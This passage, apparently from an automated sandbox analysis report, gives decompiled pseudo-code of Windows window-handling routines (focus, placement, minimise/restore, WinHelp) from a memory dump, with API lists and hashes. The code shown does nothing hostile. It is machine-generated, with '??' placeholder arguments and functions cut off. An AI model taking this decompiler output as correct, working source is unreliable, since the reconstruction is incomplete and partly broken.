                                  									E0042955C(_v24, 0);
                                  									return RestoreDC(_v32, _v28);
                                  								}
                                  							} else {
                                  								if(_t214 == 0x27) {
                                  									_v36 =  *((intOrPtr*)(__edx + 8));
                                  									_t291 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  									__eflags = _t291;
                                  									if(_t291 < 0) {
                                  										goto L67;
                                  									} else {
                                  										_t292 = _t291 + 1;
                                  										_t369 = 0;
                                  										__eflags = 0;
                                  										while(1) {
                                  											_t252 =  *((intOrPtr*)( *((intOrPtr*)(E0041C834(_v8, _t293, _t369))) + 0x34))();
                                  											_t342 = _v36;
                                  											__eflags = _t252 -  *((intOrPtr*)(_t342 + 0xc));
                                  											if(_t252 !=  *((intOrPtr*)(_t342 + 0xc))) {
                                  												_t254 = E0041C834(_v8, _t293, _t369);
                                  												_t293 = 1;
                                  												_v16 = E0045AAAC(_t254, 1,  *((intOrPtr*)(_v36 + 0xc)));
                                  											} else {
                                  												_v16 =  *((intOrPtr*)(E0041C834(_v8, _t293, _t369) + 0x34));
                                  											}
                                  											__eflags = _v16;
                                  											if(_v16 != 0) {
                                  												break;
                                  											}
                                  											_t369 = _t369 + 1;
                                  											_t292 = _t292 - 1;
                                  											__eflags = _t292;
                                  											if(_t292 != 0) {
                                  												continue;
                                  											} else {
                                  												goto L67;
                                  											}
                                  											goto L68;
                                  										}
                                  										_t258 = E0045AADC(E0041C834(_v8, _t293, _t369), 1,  *((intOrPtr*)(_v36 + 8)));
                                  										__eflags = _t258;
                                  										if(_t258 == 0) {
                                  											_t266 = E0041C834(_v8, 1, _t369);
                                  											__eflags = 0;
                                  											_t258 = E0045AADC(_t266, 0,  *((intOrPtr*)(_v36 + 0xc)));
                                  										}
                                  										_t349 =  *0x4bb224; // 0x4bcb80
                                  										_t351 =  *( *_t349 + 0x6c);
                                  										__eflags = _t351;
                                  										if(_t351 != 0) {
                                  											__eflags = _t258;
                                  											if(_t258 == 0) {
                                  												_t258 =  *(_t351 + 0x158);
                                  											}
                                  											__eflags =  *(_t351 + 0x228) & 0x00000008;
                                  											if(( *(_t351 + 0x228) & 0x00000008) == 0) {
                                  												_t352 =  *0x4bb048; // 0x4bcb7c
                                  												E00467A3C( *_t352, _t292, _t258, _t369, _t371);
                                  											} else {
                                  												E00467AC4();
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									L67:
                                  									_push( *(_t371 + 8));
                                  									_push( *(_t371 + 4));
                                  									_push( *_t371);
                                  									_t144 =  *(_v8 + 0x10);
                                  									_push(_t144);
                                  									L0040703C();
                                  									 *(_t371 + 0xc) = _t144;
                                  								}
                                  								L68:
                                  								_pop(_t307);
                                  								 *[fs:eax] = _t307;
                                  								_push(0x45bd26);
                                  								return E004043D8( &_v52);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L69:
                                  			}


                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: RestoreSaveWindow$NtdllProc_
                                  • String ID:
                                  • API String ID: 1346906915-0
                                  • Opcode ID: 95c3e9ad46ead51256eb9651a89e1287401cc4847bc80ba6a5a6eaa59e715442
                                  • Instruction ID: 48b1cd7b85039716402d31f6a6a9c09f7f70ce538e508dff473147ea1834fcb6
                                  • Opcode Fuzzy Hash: 95c3e9ad46ead51256eb9651a89e1287401cc4847bc80ba6a5a6eaa59e715442
                                  • Instruction Fuzzy Hash: A5E18134A00609DFDB11EFA9C98199EF7F5FF48305B2485AAE80197362D738ED45CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E00460A1C(intOrPtr __eax, struct HWND__** __edx) {
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				intOrPtr _v16;
                                  				struct HDC__* _v20;
                                  				struct HWND__* _v24;
                                  				void* __ebp;
                                  				struct HWND__* _t92;
                                  				intOrPtr _t112;
                                  				intOrPtr _t115;
                                  				struct HWND__* _t121;
                                  				struct HWND__* _t124;
                                  				intOrPtr _t128;
                                  				struct HWND__* _t129;
                                  				intOrPtr _t130;
                                  				intOrPtr _t131;
                                  				struct HWND__* _t133;
                                  				struct HWND__* _t136;
                                  				intOrPtr _t142;
                                  				intOrPtr _t172;
                                  				struct HWND__** _t201;
                                  				struct HWND__* _t219;
                                  				struct HWND__* _t220;
                                  				intOrPtr _t229;
                                  				void* _t231;
                                  				void* _t232;
                                  				intOrPtr _t238;
                                  				intOrPtr _t246;
                                  				struct HWND__* _t250;
                                  				struct HWND__* _t251;
                                  				struct HWND__* _t256;
                                  				struct HWND__* _t257;
                                  				void* _t259;
                                  				void* _t261;
                                  				intOrPtr _t262;
                                  				void* _t264;
                                  				void* _t268;
                                  
                                  				_t259 = _t261;
                                  				_t262 = _t261 + 0xffffffec;
                                  				_t201 = __edx;
                                  				_v8 = __eax;
                                  				_t92 =  *__edx;
                                  				_t219 = _t92;
                                  				_t264 = _t219 - 0x46;
                                  				if(_t264 > 0) {
                                  					_t220 = _t219 - 0xb01a;
                                  					__eflags = _t220;
                                  					if(_t220 == 0) {
                                  						__eflags =  *(_v8 + 0xa0);
                                  						if(__eflags != 0) {
                                  							E00403814(_v8, __eflags);
                                  						}
                                  					} else {
                                  						__eflags = _t220 == 1;
                                  						if(_t220 == 1) {
                                  							__eflags =  *(_v8 + 0xa0);
                                  							if(__eflags != 0) {
                                  								E00403814(_v8, __eflags);
                                  							}
                                  						} else {
                                  							goto L41;
                                  						}
                                  					}
                                  					goto L43;
                                  				} else {
                                  					if(_t264 == 0) {
                                  						_t112 = _v8;
                                  						_t229 =  *0x460e50; // 0x1
                                  						__eflags = _t229 - ( *(_t112 + 0x1c) &  *0x460e4c);
                                  						if(_t229 == ( *(_t112 + 0x1c) &  *0x460e4c)) {
                                  							_t115 = _v8;
                                  							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
                                  							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
                                  								_t128 = _v8;
                                  								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
                                  								if( *((char*)(_t128 + 0x22b)) != 2) {
                                  									_t129 = __edx[2];
                                  									_t26 = _t129 + 0x18;
                                  									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
                                  									__eflags =  *_t26;
                                  								}
                                  							}
                                  							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
                                  							__eflags = _t121;
                                  							if(_t121 == 0) {
                                  								L30:
                                  								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
                                  								__eflags = _t124;
                                  								if(_t124 == 0) {
                                  									L32:
                                  									 *( *((intOrPtr*)(_t201 + 8)) + 0x18) =  *( *((intOrPtr*)(_t201 + 8)) + 0x18) | 0x00000001;
                                  								} else {
                                  									__eflags = _t124 == 3;
                                  									if(_t124 == 3) {
                                  										goto L32;
                                  									}
                                  								}
                                  							} else {
                                  								__eflags = _t121 == 2;
                                  								if(_t121 == 2) {
                                  									goto L30;
                                  								}
                                  							}
                                  						}
                                  						goto L43;
                                  					} else {
                                  						_t231 = _t219 + 0xfffffffa - 3;
                                  						if(_t231 < 0) {
                                  							__eflags =  *0x4a0f34;
                                  							if( *0x4a0f34 != 0) {
                                  								__eflags =  *__edx - 7;
                                  								if( *__edx != 7) {
                                  									goto L43;
                                  								} else {
                                  									_t130 = _v8;
                                  									__eflags =  *(_t130 + 0x1c) & 0x00000010;
                                  									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
                                  										goto L43;
                                  									} else {
                                  										_t256 = 0;
                                  										_t131 = _v8;
                                  										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
                                  										if( *((char*)(_t131 + 0x22f)) != 2) {
                                  											_t133 =  *(_v8 + 0x220);
                                  											__eflags = _t133;
                                  											if(_t133 != 0) {
                                  												__eflags = _t133 - _v8;
                                  												if(_t133 != _v8) {
                                  													_t256 = E0044D590(_t133);
                                  												}
                                  											}
                                  										} else {
                                  											_t136 = E00461348(_v8);
                                  											__eflags = _t136;
                                  											if(_t136 != 0) {
                                  												_t256 = E0044D590(E00461348(_v8));
                                  											}
                                  										}
                                  										__eflags = _t256;
                                  										if(_t256 == 0) {
                                  											goto L43;
                                  										} else {
                                  											_t92 = SetFocus(_t256);
                                  										}
                                  									}
                                  								}
                                  							}
                                  							goto L44;
                                  						} else {
                                  							_t232 = _t231 - 0x22;
                                  							if(_t232 == 0) {
                                  								_v24 = __edx[2];
                                  								__eflags = _v24->i - 1;
                                  								if(_v24->i != 1) {
                                  									goto L43;
                                  								} else {
                                  									_t142 = _v8;
                                  									__eflags =  *(_t142 + 0x248);
                                  									if( *(_t142 + 0x248) == 0) {
                                  										goto L43;
                                  									} else {
                                  										_t250 = E0045AAAC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
                                  										__eflags = _t250;
                                  										if(_t250 == 0) {
                                  											goto L43;
                                  										} else {
                                  											_v16 = E00428DB4(0, 1);
                                  											_push(_t259);
                                  											_push(0x460c95);
                                  											_push( *[fs:eax]);
                                  											 *[fs:eax] = _t262;
                                  											_v12 = SaveDC( *(_v24 + 0x18));
                                  											_push(_t259);
                                  											_push(0x460c78);
                                  											_push( *[fs:eax]);
                                  											 *[fs:eax] = _t262;
                                  											E0042955C(_v16,  *(_v24 + 0x18));
                                  											E004293D8(_v16);
                                  											E0045BFC4(_t250, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
                                  											_pop(_t238);
                                  											 *[fs:eax] = _t238;
                                  											_push(0x460c7f);
                                  											__eflags = 0;
                                  											E0042955C(_v16, 0);
                                  											return RestoreDC( *(_v24 + 0x18), _v12);
                                  										}
                                  									}
                                  								}
                                  							} else {
                                  								if(_t232 == 1) {
                                  									_t257 = __edx[2];
                                  									__eflags = _t257->i - 1;
                                  									if(_t257->i != 1) {
                                  										goto L43;
                                  									} else {
                                  										_t172 = _v8;
                                  										__eflags =  *(_t172 + 0x248);
                                  										if( *(_t172 + 0x248) == 0) {
                                  											goto L43;
                                  										} else {
                                  											_t251 = E0045AAAC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t257 + 8)));
                                  											__eflags = _t251;
                                  											if(_t251 == 0) {
                                  												goto L43;
                                  											} else {
                                  												_v20 = GetWindowDC(E0044D590(_v8));
                                  												 *[fs:eax] = _t262;
                                  												_v16 = E00428DB4(0, 1);
                                  												 *[fs:eax] = _t262;
                                  												_v12 = SaveDC(_v20);
                                  												 *[fs:eax] = _t262;
                                  												E0042955C(_v16, _v20);
                                  												E004293D8(_v16);
                                  												 *((intOrPtr*)(_t251->i + 0x38))(_t257 + 0x10,  *[fs:eax], 0x460d7f, _t259,  *[fs:eax], 0x460d9c, _t259,  *[fs:eax], 0x460dc3, _t259);
                                  												_pop(_t246);
                                  												 *[fs:eax] = _t246;
                                  												_push(0x460d86);
                                  												__eflags = 0;
                                  												E0042955C(_v16, 0);
                                  												return RestoreDC(_v20, _v12);
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									L41:
                                  									_t268 = _t92 -  *0x4bcb88; // 0xc07c
                                  									if(_t268 == 0) {
                                  										E00447F3C(_v8, 0, 0xb025, 0);
                                  										E00447F3C(_v8, 0, 0xb024, 0);
                                  										E00447F3C(_v8, 0, 0xb035, 0);
                                  										E00447F3C(_v8, 0, 0xb009, 0);
                                  										E00447F3C(_v8, 0, 0xb008, 0);
                                  										E00447F3C(_v8, 0, 0xb03d, 0);
                                  									}
                                  									L43:
                                  									_t92 = E0044AFA4(_v8, _t201);
                                  									L44:
                                  									return _t92;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: RestoreSave$FocusWindow
                                  • String ID:
                                  • API String ID: 1553564791-0
                                  • Opcode ID: 735be3669c23069294712bf73b040927d142e75c115ee443a59895b32fa45eba
                                  • Instruction ID: df41744d0482e6c5423bc326cb51b6476b74b7390ef3ea2c4a99f6163abcc3be
                                  • Opcode Fuzzy Hash: 735be3669c23069294712bf73b040927d142e75c115ee443a59895b32fa45eba
                                  • Instruction Fuzzy Hash: F1B19235A00204EFCB14DFA8C985AAFB7F5EB49304F6544A6F404E7362E739AE01CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00466E64(void* __eax) {
                                  				struct HWND__* _t21;
                                  				intOrPtr* _t26;
                                  				signed int _t29;
                                  				intOrPtr* _t30;
                                  				int _t33;
                                  				intOrPtr _t36;
                                  				void* _t51;
                                  				int _t60;
                                  
                                  				_t51 = __eax;
                                  				_t21 = IsIconic( *(__eax + 0x30));
                                  				if(_t21 != 0) {
                                  					SetActiveWindow( *(_t51 + 0x30));
                                  					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
                                  						L6:
                                  						E00465D60( *(_t51 + 0x30), 9, __eflags);
                                  					} else {
                                  						_t60 = IsWindowEnabled(E0044D590( *((intOrPtr*)(_t51 + 0x44))));
                                  						if(_t60 == 0) {
                                  							goto L6;
                                  						} else {
                                  							_push(0);
                                  							_push(0xf120);
                                  							_push(0x112);
                                  							_push( *(_t51 + 0x30));
                                  							L0040703C();
                                  						}
                                  					}
                                  					_t26 =  *0x4bae68; // 0x4bc904
                                  					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
                                  					if(_t60 < 0) {
                                  						asm("adc eax, 0x0");
                                  					}
                                  					_t30 =  *0x4bae68; // 0x4bc904
                                  					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
                                  					if(_t60 < 0) {
                                  						asm("adc eax, 0x0");
                                  					}
                                  					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
                                  					_t36 =  *((intOrPtr*)(_t51 + 0x44));
                                  					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
                                  						E004619F0(_t36, 0);
                                  						E00463E14( *((intOrPtr*)(_t51 + 0x44)));
                                  					}
                                  					E004664B0(_t51);
                                  					_t21 =  *0x4bcb80; // 0x1c40e90
                                  					_t55 =  *((intOrPtr*)(_t21 + 0x64));
                                  					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
                                  						_t21 = SetFocus(E0044D590(_t55));
                                  					}
                                  					if( *((short*)(_t51 + 0x122)) != 0) {
                                  						return  *((intOrPtr*)(_t51 + 0x120))();
                                  					}
                                  				}
                                  				return _t21;
                                  			}












                                  APIs
                                  • IsIconic.USER32(?), ref: 00466E6C
                                  • SetActiveWindow.USER32(?), ref: 00466E7D
                                  • IsWindowEnabled.USER32(00000000), ref: 00466EA0
                                  • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00466891,00000000,00466D4F), ref: 00466EB9
                                  • SetWindowPos.USER32(?,00000000,00000000,?,?,00466891,00000000), ref: 00466EFF
                                  • SetFocus.USER32 ref: 00466F44
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                  • String ID:
                                  • API String ID: 3996302123-0
                                  • Opcode ID: 9a729dc3667cd1bc5cc523d41ce0c4f52be4f6b65fbb32a82fcf7d51c1ea8602
                                  • Instruction ID: 345a9c80e758f710a3a73f3c540ac67a1ac8f3b4f8b4de9f110f0023fc02b51c
                                  • Opcode Fuzzy Hash: 9a729dc3667cd1bc5cc523d41ce0c4f52be4f6b65fbb32a82fcf7d51c1ea8602
                                  • Instruction Fuzzy Hash: 4631EE75B00240ABEB15EA69DD86B563798AB04704F0904AAFD00DF2D7EA7DEC44875E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0044CF7C(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
                                  				void* _v20;
                                  				struct _WINDOWPLACEMENT _v48;
                                  				char _v64;
                                  				void* _t31;
                                  				int _t45;
                                  				int _t51;
                                  				void* _t52;
                                  				int _t56;
                                  				int _t58;
                                  
                                  				_t56 = __ecx;
                                  				_t58 = __edx;
                                  				_t52 = __eax;
                                  				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
                                  					L4:
                                  					if(E0044D894(_t52) == 0) {
                                  						L7:
                                  						 *(_t52 + 0x40) = _t58;
                                  						 *(_t52 + 0x44) = _t56;
                                  						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
                                  						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
                                  						_t31 = E0044D894(_t52);
                                  						__eflags = _t31;
                                  						if(_t31 != 0) {
                                  							_v48.length = 0x2c;
                                  							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                  							E004466E4(_t52,  &_v64);
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                  						}
                                  						L9:
                                  						E00446370(_t52);
                                  						return E00403814(_t52, _t66);
                                  					}
                                  					_t45 = IsIconic( *(_t52 + 0x180));
                                  					_t66 = _t45;
                                  					if(_t45 != 0) {
                                  						goto L7;
                                  					}
                                  					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
                                  					goto L9;
                                  				} else {
                                  					_t51 = _a4;
                                  					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
                                  						return _t51;
                                  					}
                                  					goto L4;
                                  				}
                                  			}













                                  APIs
                                  • IsIconic.USER32(?), ref: 0044CFBB
                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044CFD9
                                  • GetWindowPlacement.USER32(?,0000002C), ref: 0044D00F
                                  • SetWindowPlacement.USER32 ref: 0044D033
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Window$Placement$Iconic
                                  • String ID: ,
                                  • API String ID: 568898626-3772416878
                                  • Opcode ID: 7293da94349a16b394f6be280665bfa224d6c4a90486748b610fe51e48919539
                                  • Instruction ID: 54eb6d6176d78dbd7ea17b4a752e87245738c08d12f695f0db95c2cdd56ca3f6
                                  • Opcode Fuzzy Hash: 7293da94349a16b394f6be280665bfa224d6c4a90486748b610fe51e48919539
                                  • Instruction Fuzzy Hash: 79218131A00204ABDF50EFADC8C199A77A9AF49314F04807BFD14EF346D639ED088B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00466DB4(void* __eax) {
                                  				int _t21;
                                  				struct HWND__* _t36;
                                  				void* _t40;
                                  
                                  				_t40 = __eax;
                                  				_t1 = _t40 + 0x30; // 0x0
                                  				_t21 = IsIconic( *_t1);
                                  				if(_t21 == 0) {
                                  					E004664A0();
                                  					_t2 = _t40 + 0x30; // 0x0
                                  					SetActiveWindow( *_t2);
                                  					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0044D590( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
                                  						_t15 = _t40 + 0x30; // 0x0
                                  						_t21 = E00465D60( *_t15, 6, __eflags);
                                  					} else {
                                  						_t43 =  *((intOrPtr*)(_t40 + 0x44));
                                  						_t36 = E0044D590( *((intOrPtr*)(_t40 + 0x44)));
                                  						_t13 = _t40 + 0x30; // 0x0
                                  						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
                                  						_push(0);
                                  						_push(0xf020);
                                  						_push(0x112);
                                  						_t14 = _t40 + 0x30; // 0x0
                                  						_t21 =  *_t14;
                                  						_push(_t21);
                                  						L0040703C();
                                  					}
                                  					if( *((short*)(_t40 + 0x11a)) != 0) {
                                  						return  *((intOrPtr*)(_t40 + 0x118))();
                                  					}
                                  				}
                                  				return _t21;
                                  			}







                                  APIs
                                  • IsIconic.USER32(00000000), ref: 00466DBC
                                  • SetActiveWindow.USER32(00000000), ref: 00466DD4
                                  • IsWindowEnabled.USER32(00000000), ref: 00466DF7
                                  • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040), ref: 00466E20
                                  • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,?,?,00467488), ref: 00466E35
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Window$ActiveEnabledIconicNtdllProc_
                                  • String ID:
                                  • API String ID: 1720852555-0
                                  • Opcode ID: bca7cdaa525652728abd8e7376297c5d3f237f54542a5aa9c3fad3c72acfeb70
                                  • Instruction ID: 52c98efa6c877b43e729e8a02bf35b1e1eec244f1f03f0e47d67c18ea37e3382
                                  • Opcode Fuzzy Hash: bca7cdaa525652728abd8e7376297c5d3f237f54542a5aa9c3fad3c72acfeb70
                                  • Instruction Fuzzy Hash: B811E6717102009BDB54EE6DCDC5B97379C6F04704F4504AABE04DF28BE679EC408759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0042FFC4(struct HWND__* _a4, signed int _a8) {
                                  				struct _WINDOWPLACEMENT _v48;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t19;
                                  				intOrPtr _t21;
                                  				struct HWND__* _t22;
                                  
                                  				_t19 = _a8;
                                  				_t22 = _a4;
                                  				if( *0x4bc92d != 0) {
                                  					if((_t19 & 0x00000003) == 0) {
                                  						if(IsIconic(_t22) == 0) {
                                  							GetWindowRect(_t22,  &(_v48.rcNormalPosition));
                                  						} else {
                                  							GetWindowPlacement(_t22,  &_v48);
                                  						}
                                  						return E0042FF34( &(_v48.rcNormalPosition), _t19);
                                  					}
                                  					return 0x12340042;
                                  				}
                                  				_t21 =  *0x4bc908; // 0x42ffc4
                                  				 *0x4bc908 = E0042FDB8(1, _t19, "MonitorFromWindow", _t21, _t22);
                                  				return  *0x4bc908(_t22, _t19);
                                  			}











                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: AddressProc
                                  • String ID: MonitorFromWindow
                                  • API String ID: 190572456-2842599566
                                  • Opcode ID: aeb33c342031030bd46b7049383622d89f433925aab56665642f34080a3ef699
                                  • Instruction ID: a51bd0da54437c844615d0cd75fc476061f2456429dd1ea41d42050c4c57b545
                                  • Opcode Fuzzy Hash: aeb33c342031030bd46b7049383622d89f433925aab56665642f34080a3ef699
                                  • Instruction Fuzzy Hash: BB01A261A051186B9714AB64ACC1AEF736C9B09314F84427BF801A7242D73DAD0687BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E004412A8(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				CHAR* _t20;
                                  				long _t25;
                                  				intOrPtr _t30;
                                  				void* _t34;
                                  				intOrPtr _t37;
                                  
                                  				_push(0);
                                  				_t34 = __eax;
                                  				_push(_t37);
                                  				_push(0x441325);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t37;
                                  				E00440D08(__eax);
                                  				_t25 = GetTickCount();
                                  				do {
                                  					Sleep(0);
                                  				} while (GetTickCount() - _t25 <= 0x3e8);
                                  				E00440908(_t34, _t25,  &_v8, 0, __edi, _t34);
                                  				if(_v8 != 0) {
                                  					_t20 = E00404898(_v8);
                                  					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
                                  				}
                                  				_pop(_t30);
                                  				 *[fs:eax] = _t30;
                                  				_push(0x44132c);
                                  				return E004043D8( &_v8);
                                  			}










                                  APIs
                                    • Part of subcall function 00440D08: WinHelpA.USER32 ref: 00440D17
                                  • GetTickCount.KERNEL32(00000000,00441325,?,?,00000000,00000000,?,0044129E), ref: 004412C6
                                  • Sleep.KERNEL32(00000000,00000000,00441325,?,?,00000000,00000000,?,0044129E), ref: 004412CF
                                  • GetTickCount.KERNEL32(00000000,00000000,00441325,?,?,00000000,00000000,?,0044129E), ref: 004412D4
                                  • WinHelpA.USER32 ref: 0044130A
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CountHelpTick$Sleep
                                  • String ID:
                                  • API String ID: 2438605093-0
                                  • Opcode ID: 3bb6e543303d0611a19aaa3b16778c40e49144bad19f2fd867846b1e24a1b4d6
                                  • Instruction ID: f7d46849a138f27251039c1bcf1d4d4cb924ece5f15ad079f252087b08c14f06
                                  • Opcode Fuzzy Hash: 3bb6e543303d0611a19aaa3b16778c40e49144bad19f2fd867846b1e24a1b4d6
                                  • Instruction Fuzzy Hash: 5601A274700304AFF311FBB6CC52B1DB2E8DB48714F51447BF900E26D1DAB86E148569
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00409218(void* __eax) {
                                  				short _v6;
                                  				short _v8;
                                  				struct _FILETIME _v16;
                                  				struct _WIN32_FIND_DATAA _v336;
                                  				void* _t16;
                                  
                                  				_t16 = FindFirstFileA(E00404898(__eax),  &_v336);
                                  				if(_t16 == 0xffffffff) {
                                  					L3:
